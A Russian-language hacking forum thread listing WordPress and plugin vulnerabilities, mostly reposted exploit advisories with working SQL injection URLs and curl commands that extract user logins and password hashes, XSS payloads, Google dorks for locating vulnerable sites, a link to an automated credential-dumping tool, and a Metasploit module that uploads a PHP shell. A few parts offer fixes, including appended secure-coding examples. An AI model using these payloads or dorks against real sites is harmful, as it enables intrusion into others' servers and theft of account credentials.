
WordPress vulnerabilities

Thread in section "Vulnerabilities of popular CMS", created by user onthar, 21 Oct 2009.

  1. onthar
    onthar Forum staff Admin
    Likes: 388
    A fresh vulnerability in WordPress that allows a DoS attack on the victim's blog via the file wp-trackback.php

    To fix this vulnerability, add the following code to the file functions.php located in the blog's theme folder:
    Code:
    function ft_stop_trackback_dos_attacks(){
        global $pagenow;
        if ( 'wp-trackback.php' == $pagenow ){
            // DoS attack fix.
            if ( isset($_POST['charset']) ){
                $charset = $_POST['charset'];
                if ( strlen($charset) > 50 ) { die; }
            }
        }
    }
    add_action('init','ft_stop_trackback_dos_attacks');
    If you are unable to or don't know how to add this code to your blog, download and install the plugin that fixes this vulnerability.

    Vulnerability exploit: jarraltech.com/2009/10/new-0-day-wordpress-exploit/
    Source: blogproblog.com/wp-trackback_dos_attack/

    (c)habrahabr
     
    21 Oct 2009
    1 person likes this.
  2. lytgeygen
    lytgeygen pacifiste maniaque Newbie
    Likes: 112
    WordPress Twitter Feed Plugin 0.x

    The vulnerability allows a remote user to perform an XSS attack on the target system. The vulnerability exists due to insufficient sanitization of input data in the "url" parameter of the script wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php. An attacker can execute arbitrary script code in the victim's browser in the security context of the vulnerable site.

    Exploit:

    http://localhost/wordpress/wp-conte...agpie_debug.php?url=<script>alert(0)</script>

    Added 11 minutes later
    WordPress 3.0.1

    Description: SQL injection vulnerability in the do_trackbacks() function of WordPress allows remote attackers to execute an arbitrary SELECT SQL query.

    Access Vector: Network
    Attack Complexity: Medium
    Authentication: Single Instance
    Confidentiality Impact: Partial
    Integrity Impact: None
    Availability Impact: None

    Detailed information
     
    Last edited: 7 Jan 2011
    7 Jan 2011
  3. lytgeygen
    lytgeygen pacifiste maniaque Newbie
    Likes: 112
    SQL injection in WordPress before version 3.0.1 (Author privileges required)

    Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
    Access Vector: Network
    Attack Complexity: Medium
    Authentication: Single Instance
    Confidentiality Impact: Partial
    Integrity Impact: None
    Availability Impact: None

    [+] exploit

     
    28 Jan 2011
  4. Хулиган
    Хулиган Forum staff Advanced
    Likes: 242
    0day vulnerability in WordPress themes

    The image-resizing utility timthumb.php, shipped with many WordPress themes, is vulnerable to upload of arbitrary PHP code. A Google search shows some 39 million such scripts on the web.

    The utility insufficiently validates the parameters passed to it, as a result of which attackers are able to upload an arbitrary script into a directory on the server.

    The script's configuration file defines the domains from which it is allowed to fetch images:

    Code:
    $allowedSites = array (
        'flickr.com',
        'picasa.com',
        'blogger.com',
        'wordpress.com',
        'img.youtube.com',
        'upload.wikimedia.org',
        'photobucket.com',
    );
    However, a bug in the validation code allows fetching from arbitrary sites that merely contain such names as subdomains of the fourth or higher level. For example:
    Code:
    blogger.com.somebadhackersite.com/badscript.php
    source: xakep.ru/post/56374/

    dork: inurl:"/timthumb.php?src="
     
    2 Aug 2011
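    Added example, not timthumb's code or the post's: a host allowlist check that rejects the fourth-level-subdomain trick described above. The naive substring check is an illustrative reconstruction of the flawed logic the post describes, not the plugin's actual source; $allowedSites is the list quoted in the post.

```php
<?php
// Added example (not timthumb's code). The naive check below is an assumed
// reconstruction of the flawed logic, kept only to contrast with the strict one.

$allowedSites = array(
    'flickr.com',
    'picasa.com',
    'blogger.com',
    'wordpress.com',
    'img.youtube.com',
    'upload.wikimedia.org',
    'photobucket.com',
);

// Flawed: accepts any URL whose text merely contains an allowed name.
function naive_is_allowed($url, array $allowed) {
    foreach ($allowed as $site) {
        if (strpos($url, $site) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened: parse the URL, normalise the host, and require that the host
// equals an allowed name or ends with ".<allowed name>" (a real subdomain),
// so "blogger.com.somebadhackersite.com" and "?x=blogger.com" are rejected.
function strict_is_allowed($url, array $allowed) {
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host'])) {
        return false;
    }
    $scheme = isset($parts['scheme']) ? strtolower($parts['scheme']) : '';
    if ($scheme !== 'http' && $scheme !== 'https') {
        return false; // reject file://, ftp:// and scheme-less input
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    foreach ($allowed as $site) {
        $site = strtolower($site);
        if ($host === $site) {
            return true;
        }
        $suffix = '.' . $site;
        if (strlen($host) > strlen($suffix)
            && substr($host, -strlen($suffix)) === $suffix) {
            return true;
        }
    }
    return false;
}

// Constructed sample inputs: two legitimate image URLs and two that abuse
// the substring match.
$tests = array(
    'http://img.youtube.com/vi/x/0.jpg',                      // allowed
    'http://farm1.flickr.com/1/2.jpg',                        // allowed subdomain
    'http://blogger.com.somebadhackersite.com/badscript.php', // must be rejected
    'http://evil.example/?x=blogger.com',                     // must be rejected
);
foreach ($tests as $u) {
    printf("%-58s naive=%-3s strict=%s\n", $u,
        naive_is_allowed($u, $allowedSites) ? 'yes' : 'no',
        strict_is_allowed($u, $allowedSites) ? 'yes' : 'no');
}
```

    The naive check answers "yes" for all four inputs; the strict check answers "yes" only for the first two.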
  5. TDI
    TDI Newbie
    Likes: 38
    Type: SQL-Inj

    Plugin: WP-FacebookConnect

    Dork: inurl:"fbconnect_action=myhome"

    The PoC itself:

    http://www.****.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
    or
    http://****.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--



    A program to automate the process:

    Everyone's dream! The "Hack" button now works *xD*

    Instructions:
    Find a vulnerable site and enter it into the program without http:// and without slashes (/)
    Like binaries.ru, and you get login:pass in Result
    Download: http://rghost.ru/14736221

    Author: Kuteke

    from antichat
     
    15 Aug 2011
  6. Хулиган
    Хулиган Forum staff Advanced
    Likes: 242
    WordPress VideoWhisper Video Presentation plugin <= 1.1 SQL Injection Vulnerability

    # Date: 2011-09-01
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/search-autocomplete.zip
    # Version: 1.0.8 (tested)
    # Note: magic_quotes has to be turned off

    ---
    PoC
    ---
    Code:
    http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--%20
    ---------------
    Vulnerable code
    ---------------
    Code:
    if ($_GET['term'] != '') {
    ...
        $titles = $wpdb->get_results("SELECT post_title As name, ID as post_id, guid AS url, 1 cnt FROM ".$wpdb->prefix."posts t WHERE post_status='publish' and (post_type='post' OR post_type='page') and post_date < NOW() and post_title LIKE '%".$_GET['term']."%' ORDER BY post_title");

    source: exploit-db.com
     
    2 Sep 2011
    1 person likes this.
  7. Хулиган
    Хулиган Forum staff Advanced
    Likes: 242
    WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability


    # Exploit Title: WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability
    # Date: 2011-09-01
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/search-autocomplete.zip
    # Version: 1.0.8 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Code:
    http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--%20
    Vulnerable code

    Code:
    if ($_GET['term'] != '') {
    ...
        $titles = $wpdb->get_results("SELECT post_title As name, ID as post_id, guid AS url, 1 cnt FROM ".$wpdb->prefix."posts t WHERE post_status='publish' and (post_type='post' OR post_type='page') and post_date < NOW() and post_title LIKE '%".$_GET['term']."%' ORDER BY post_title");

    WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 SQL Injection Vulnerability

    # Exploit Title: WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 SQL Injection Vulnerability
    # Date: 2011-09-03
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/facebook-opengraph-meta-plugin.zip
    # Version: 1.0 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Code:
    http://www.site.com/wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php?pst_title=1') UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20&page=1&rows=1

    Vulnerable code

    Code:
    $page = $_GET['page']; // get the requested page
    $limit = $_GET['rows']; // get how many rows we want to have into the grid
    ...
    if(isset($_REQUEST["pst_title"]))
        $pst_title = $_REQUEST['pst_title'];
    ...
    if($pst_title!=''){
        $where.= " AND (wposts.post_title LIKE '%$pst_title%'";
        $where.= " OR wpostmeta.meta_value LIKE '%$pst_title%')";
    }

    $result = $wpdb->get_var("SELECT COUNT(*) AS count FROM $wpdb->postmeta WHERE meta_key = '_OgMeta'");
    $count = $result['count'];
    if( $count >0 )
    {
        $total_pages = ceil($count/$limit);
    }
    else
    {
        $total_pages = 0;
    }
    if ($page > $total_pages)
        $page=$total_pages;
    $start = $limit*$page - $limit;
    ...
    $querystr = "
        SELECT wposts.*
        FROM $wpdb->posts wposts, $wpdb->postmeta wpostmeta
        WHERE wposts.ID = wpostmeta.post_id
        AND wpostmeta.meta_key = '_OgMeta'
        AND wposts.post_status = 'publish'
        AND (wposts.post_type = 'post' OR wposts.post_type = 'page')".$where.
        "ORDER BY wposts.post_date DESC
        LIMIT $start , $limit
    ";

    $result = $wpdb->get_results($querystr);//, OBJECT);
    WordPress Zotpress plugin <= 4.4 SQL Injection Vulnerability

    # Exploit Title: WordPress Zotpress plugin <= 4.4 SQL Injection Vulnerability
    # Date: 2011-09-04
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/zotpress.4.4.zip
    # Version: 4.4 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Code:
    http://www.site.com/wp-content/plugins/zotpress/zotpress.rss.php?api_user_id=1&account_type=test&displayImages=true&displayImageByCitationID=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23

    Vulnerable code

    Code:
    if ($mzr_api_user_id == false
        && $mzr_include == false
        && (isset($_GET['api_user_id']) && preg_match("/^[0-9]+$/", $_GET['api_user_id'])))
    {
        $mzr_api_user_id = trim($_GET['api_user_id']);
    }
    ...
    if ($mzr_account_type == false
        && $mzr_include == false
        && (isset($_GET['account_type']) && preg_match("/^[a-zA-Z]+$/", $_GET['account_type'])))
    {
        $mzr_account_type = trim($_GET['account_type']);
    }
    ...
    if ($mzr_displayImages == false
        && $mzr_include == false
        && (isset($_GET['displayImages']) && preg_match("/^[a-zA-Z]+$/", $_GET['displayImages'])))
    {
        $zp_update_db_shortcode_request .= "image='".$_GET['displayImages']."', ";

        if ($_GET['displayImages'] == "true")
            $mzr_displayImages = true;
        else
            $mzr_displayImages = false;
    }
    ...
    if (isset($mzr_account_type) && isset($mzr_api_user_id))
    {
        if ($mzr_displayImages == true)
        {
            if (isset($_GET['displayImageByCitationID']))
                $images = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."zotpress_images WHERE citation_id='".trim($_GET['displayImageByCitationID'])."'");
    WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability

    # Exploit Title: WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability
    # Date: 2011-09-05
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/oqey-gallery.0.4.8.zip
    # Version: 0.4.8 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Code:
    http://www.site.com/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0' UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23

    Vulnerable code

    Code:
    if(isset($_REQUEST['gal_id'])){
        ...
        $data = explode("-", $_REQUEST['gal_id']);
        $id = $data[0];
        ...
        $s = $wpdb->get_row("SELECT * FROM $oqey_galls WHERE id ='".$id."' ");
    WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection Vulnerability

    # Exploit Title: WordPress Tweet Old Post plugin <= 3.2.5 SQL Injection Vulnerability
    # Date: 2011-09-05
    # Author: sherl0ck_ < sherl0ck_ [at] alligatorteam [dot] org >
    # Software Link: http://downloads.wordpress.org/plugin/tweet-old-post.zip
    # Version: 3.2.5 (tested)


    PoC (POST data)

    URL:
    http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts

    POST Data:
    Code:
    delids=1&selFilter=excluded&cat=1=0) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1
    e.g.:
    Code:
    curl --cookie "[COOKIE]" --data "delids=1&selFilter=excluded&cat=1) UNION ALL SELECT USER(),concat(user_login,char(58),user_pass),DATABASE(),@@version,null from wp_users#&setFilter=Filter&s=hello&chkbx=1" http://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts


    Vulnerable code

    Code:
    if(isset($_POST["setFilter"]))
    {
        if($_POST["cat"] != 0)
        {
            $sql = $sql . " and p.ID IN ( SELECT tr.object_id FROM ".$wpdb->prefix."term_relationships AS tr INNER JOIN ".$wpdb->prefix."term_taxonomy AS tt ON tr.term_taxonomy_id = tt.term_taxonomy_id WHERE tt.taxonomy = 'category' AND tt.term_id=" . $_POST["cat"] . ")";
            $cat_filter = $_POST["cat"];
    WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability

    # Exploit Title: WordPress post highlights plugin <= 2.2 SQL Injection Vulnerability
    # Date: 2011-09-06
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/post-highlights.2.2.zip
    # Version: 2.2 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Code:
    http://www.site.com/wp-content/plugins/post-highlights/ajax/ph_settings.php?id=-1' OR 1=1--%20

    Vulnerable code

    Code:
    $id = $_GET["id"];
    ...
    $query = "SELECT guid, ID FROM $wpdb->posts WHERE post_type='attachment' AND post_parent='$id'";
    WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability

    # Exploit Title: WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability
    # Date: 2011-09-06
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/knr-author-list-widget.zip
    # Version: 2.0.0 (tested)


    PoC

    Code:
    http://www.site.com/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

    Vulnerable code

    Code:
    foreach ($_GET['listItem'] as $position => $item) :
        $iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = $item";
        $wpdb->query($iterSql);
    endforeach;
    WordPress SCORM Cloud plugin <= 1.0.6.6 SQL Injection Vulnerability

    # Exploit Title: WordPress SCORM Cloud plugin <= 1.0.6.6 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/scormcloud.1.0.6.6.zip
    # Version: 1.0.6.6 (tested)
    # Note: magic_quotes has to be turned off


    PoC (POST data)

    http://www.site.com/wp-content/plugins/scormcloud/ajax.php
    action=addAnonRegGetLaunchUrl&inviteid=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20


    e.g.:
    Code:
    curl --data "action=addAnonRegGetLaunchUrl&inviteid=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " http://www.site.com/wp-content/plugins/scormcloud/ajax.php

    Vulnerable code

    Code:
    $action = $_POST['action'];

    switch($action)
    {
        ...
        $inviteId = $_POST['inviteid'];
        $querystr = "SELECT * FROM ".scormcloud_getDBPrefix()."scormcloudinvitations WHERE invite_id = '$inviteId'";
        $invites = $wpdb->get_results($querystr, OBJECT);
    WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection Vulnerability

    # Exploit Title: WordPress Eventify - Simple Events plugin <= 1.7.f SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/eventify.zip
    # Version: 1.7.f (tested)
    # Note: magic_quotes has to be turned off


    PoC (POST data)

    Code:
    http://www.site.com/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php
    npath=../../../../../wp-content&eventid=-1' UNION ALL SELECT 1,2,current_user(),connection_id(),version(),database(),7,8,9--%20
    e.g.:
    Code:
    curl --data "npath=../../../../../wp-content&eventid=-1' UNION ALL SELECT 1,2,current_user(),connection_id(),version(),database(),7,8,9-- " http://www.site.com/wp-content/plugins/eventify/php/ajax/fetcheventdetails.php

    Vulnerable code

    Code:
    require_once(str_ireplace("/wp-content","",$_POST['npath']).'/wp-load.php');
    $eventid = $_POST['eventid'];
    $action = "fetch";

    if($action=="fetch"){
        ...
        $qry= "select * from ".$table_name." where em_id='$eventid'" ;
        ...
        $results = $wpdb->get_results($qry);
    Wordpress 1 Flash Gallery Plugin Arbitrary File Upload Exploit (MSF)

    # Exploit Title: 1 Flash Gallery Wordpress Plugin Arbitrary File Upload Exploit
    # Google Dork: inurl:"wp-content/plugins/1-flash-gallery"
    # Date: 09/06/2011
    # Author: Ben Schmidt
    # Software Link: http://downloads.wordpress.org/plugin/1-flash-gallery.1.5.6.zip
    # Version: v1.30 to v1.5.7a (tested on 1.5.6 and 1.5.7 prior to patch)

    Code:
    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::Tcp
      include Msf::Exploit::Remote::HttpClient

      def initialize(info = {})
        super(update_info(info,
          'Name'           => '1 Flash Gallery Wordpress Plugin File Upload Exploit',
          'Description'    => %q{
            This module exploits an arbitrary file upload vulnerability in
            the '1 Flash Gallery' Wordpress plugin.
          },
          'Author'         => [ 'Ben Schmidt' ],
          'License'        => MSF_LICENSE,
          'References'     => [ "http://spareclockcycles.org/2011/09/06/flash-gallery-arbitrary-file-upload/" ],
          'Privileged'     => false,
          'Payload'        =>
            {
              'DisableNops' => true,
              # Arbitrary big number. The payload gets sent as an HTTP
              # POST request, so it's possible this might be smaller (maybe?)
              # but very unlikely.
              'Space' => 262144, # 256k
            },
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        => [[ 'Automatic', { } ]],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Sept 6, 2011'
        ))

        register_options([
          OptString.new('URI', [true, "Path to Wordpress", "/"]),
        ], self.class)
      end

      def exploit
        boundary = rand_text_alphanumeric(6)
        fn = rand_text_alphanumeric(8)
        data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filedata\"; "
        data << "filename=\"#{fn}.php\"\r\nContent-Type: application/x-httpd-php\r\n\r\n"
        data << payload.encoded
        data << "\r\n--#{boundary}--"

        res = send_request_raw({
          'uri'     => datastore['URI'] + "/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php",
          'method'  => 'POST',
          'data'    => data,
          'headers' =>
            {
              'Content-Type'   => 'multipart/form-data; boundary=' + boundary,
              'Content-Length' => data.length,
            }
        }, 25)

        if (res)
          print_status("Successfully uploaded shell.")
          shell_path = res.body.split("_")[0]
          print_status("Trying to access shell at #{shell_path}...")
          res = send_request_raw({
            'uri'    => datastore['URI'] + shell_path,
            'method' => 'GET',
          }, 0.01)
        else
          print_error("Error uploading shell")
        end

        handler
      end
    end
    WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability

    # Exploit Title: WordPress Paid Downloads plugin <= 2.01 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/paid-downloads.2.01.zip
    # Version: 2.01 (tested)
    # Note: magic_quotes has to be turned off


    PoC

    Code:
    http://www.site.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
    Vulnerable code

    Code:
    $download_key = $_GET["download_key"];
    $sql = "SELECT * FROM ".$wpdb->prefix."pd_downloadlinks WHERE download_key = '".$download_key."'";
    $link_details = $wpdb->get_row($sql, ARRAY_A);
    WordPress Community Events plugin <= 1.2.1 SQL Injection Vulnerability

    # Exploit Title: WordPress Community Events plugin <= 1.2.1 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/community-events.zip
    # Version: 1.2.1 (tested)


    PoC (POST data)

    Code:
    http://www.site.com/wp-content/plugins/community-events/tracker.php
    id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20
    e.g.:
    Code:
    curl --data "id=-1 AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))-- " http://www.site.com/wp-content/plugins/community-events/tracker.php
    Vulnerable code

    Code:
    $event_id = $_POST['id'];
    ...
    $ceeventdataquery = "select * from " . $wpdb->get_blog_prefix() . "ce_events where event_id = " . $event_id;
    WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability

    # Exploit Title: WordPress WP-Filebase Download Manager plugin <= 0.2.9 SQL Injection Vulnerability
    # Date: 2011-09-09
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/wp-filebase.0.2.9.zip
    # Version: 0.2.9 (tested)

    PoC

    Code:
    http://www.site.com/wp-content/plugins/wp-filebase/wpfb-ajax.php?action=tree&base=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&root=source
    Vulnerable code

    Code:
    if(!isset($_REQUEST['action']))
        die('-1');
    ...
    switch ( $action = $_REQUEST['action'] ) {
        case 'tree':
            ...
            $base_id = (empty($_REQUEST['base']) ? 0 : $_REQUEST['base']);
            ...
            if(empty($_REQUEST['root']) || $_REQUEST['root'] == 'source')
                $parent_id = $base_id;
            else {
                $root = $_REQUEST['root'];
                $parent_id = is_numeric($root) ? intval($root) : intval(substr(strrchr($root,'-'),1));
            }
            ...
            $cats = $browser ? WPFB_Category::GetFileBrowserCats($parent_id) : WPFB_Category::GetCats("WHERE cat_parent = $parent_id ORDER BY cat_name ASC");
    WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability

    # Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability
    # Date: 2011-09-09
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip
    # Version: 1.3 (tested)
    # Note: magic_quotes has to be turned off

    PoC

    Code:
    http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
    Vulnerable code

    Code:
    $init_letter = $_GET['R'];
    $sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id";
    ...
    $sql_rec = $wpdb->get_results($sql);
    Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability

    # Exploit Title: Wordpress Event Registration plugin <= 5.44 SQL Injection Vulnerability
    # Google Dork: "?regevent_action=register&event_id"
    # Date: 2011-09-09
    # Author: serk
    # Vendor: http://edgetechweb.com/
    # Software Link: https://wordpress.org/extend/plugins/events-registration/
    # Version: 5.44

    [ exploit ]

    Code:
    domain.tld/events-2/?regevent_action=register&event_id=2%20UNION%20SELECT%201,concat%28user_login,0x3a,user_pass,0x3a,user_email%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33%20from%20wp_users--
    WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability

    # Exploit Title: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability
    # Date: 2011-09-10
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/tune-library.zip
    # Version: 1.5.1 (tested)
    # Notes: magic_quotes has to be turned off
    # Plugin setting "Filter artists by letter and show alphabetical navigation" has to be turned on

    PoC

    Code:
    http://www.site.com/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
    Vulnerable code

    Code:
    $artistletter = $_GET['letter'];
    ...
    if ($options['oneletter'] == false || $showallartists == true)
        ...
    else
    {
        if ($artistletter == '#')
            ...
        else
        {
            $querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";
        }
    }
    WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability

    # Exploit Title: WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability
    # Date: 2011-09-07
    # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
    # Software Link: http://downloads.wordpress.org/plugin/forum-server.zip
    # Version: 1.7 (tested)

    PoC (POST data)

    Code:
    http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php
    edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&subject=1&content=1&thread_id=1
    e.g.

    Code:
    curl --data "edit_post_submit=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20&subject=1&content=1&thread_id=1" http://www.site.com/wp-content/plugins/forum-server/wpf-insert.php
    Vulnerable code

    Code:
    if(isset($_POST['edit_post_submit'])){
        $subject = $vasthtml->input_filter($_POST['edit_post_subject']);
        $content = $vasthtml->input_filter($_POST['message']);
        $thread = $vasthtml->check_parms($_POST['thread_id']);
        $edit_post_id = $_POST['edit_post_id'];
        ...
        $sql = ("UPDATE $vasthtml->t_posts SET text = '".stripslashes($content)."', subject = '".stripslashes($subject)."' WHERE id = $edit_post_id");
        $wpdb->query($sql);
    (c) bugsearch

    13 Sep 2011
    2 users like this.
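    Added example, not code from any of the plugins or advisories above: the search that search-autocomplete's tags.php builds by string concatenation, rewritten with a prepared statement, plus the integer-ID case from the KNR Author List and Community Events advisories. It uses an in-memory SQLite table as a stand-in for wp_posts with constructed sample rows; in WordPress the equivalent is $wpdb->prepare() with $wpdb->esc_like().

```php
<?php
// Added example (not plugin code). SQLite in memory stands in for the
// WordPress database; the rows below are constructed sample data.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT,
            post_status TEXT, post_type TEXT, guid TEXT)");
$seed = $db->prepare("INSERT INTO wp_posts VALUES (?, ?, ?, ?, ?)");
$seed->execute(array(1, 'Hello world',  'publish', 'post', 'http://example/1'));
$seed->execute(array(2, 'Secret draft', 'draft',   'post', 'http://example/2'));
$seed->execute(array(3, '100% organic', 'publish', 'page', 'http://example/3'));

// The vulnerable pattern from the advisories: user input spliced into SQL.
function search_titles_unsafe(PDO $db, $term) {
    $sql = "SELECT post_title AS name, ID AS post_id, guid AS url FROM wp_posts "
         . "WHERE post_status='publish' AND (post_type='post' OR post_type='page') "
         . "AND post_title LIKE '%" . $term . "%' ORDER BY post_title";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the term is bound as a value, so it can never alter the query
// structure; LIKE metacharacters are escaped so a search for "100%" matches
// the literal percent sign instead of every row.
function search_titles_safe(PDO $db, $term) {
    $escaped = addcslashes($term, '%_\\');   // same role as $wpdb->esc_like()
    $stmt = $db->prepare(
        "SELECT post_title AS name, ID AS post_id, guid AS url FROM wp_posts "
      . "WHERE post_status='publish' AND (post_type='post' OR post_type='page') "
      . "AND post_title LIKE :pattern ESCAPE '\\' ORDER BY post_title");
    $stmt->execute(array(':pattern' => '%' . $escaped . '%'));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Numeric IDs (the KNR Author List and Community Events cases) need no quoting
// once coerced: reject anything that is not a plain non-negative integer.
function fetch_post_by_id(PDO $db, $raw_id) {
    if (!ctype_digit((string) $raw_id)) {
        return null;                          // "-1 AND ..." never reaches SQL
    }
    $stmt = $db->prepare("SELECT ID, post_title FROM wp_posts WHERE ID = :id");
    $stmt->execute(array(':id' => (int) $raw_id));
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// A term that closes the string literal and appends its own condition:
// the unsafe version returns every row including the unpublished draft,
// the safe version treats it as text and returns nothing.
$probe = "x' OR post_status='draft' OR post_title LIKE '";
print_r(search_titles_unsafe($db, $probe));   // includes "Secret draft"
print_r(search_titles_safe($db, $probe));     // empty array
print_r(search_titles_safe($db, '100%'));     // only "100% organic"
var_dump(fetch_post_by_id($db, '1 OR 1=1'));  // NULL: rejected before the query
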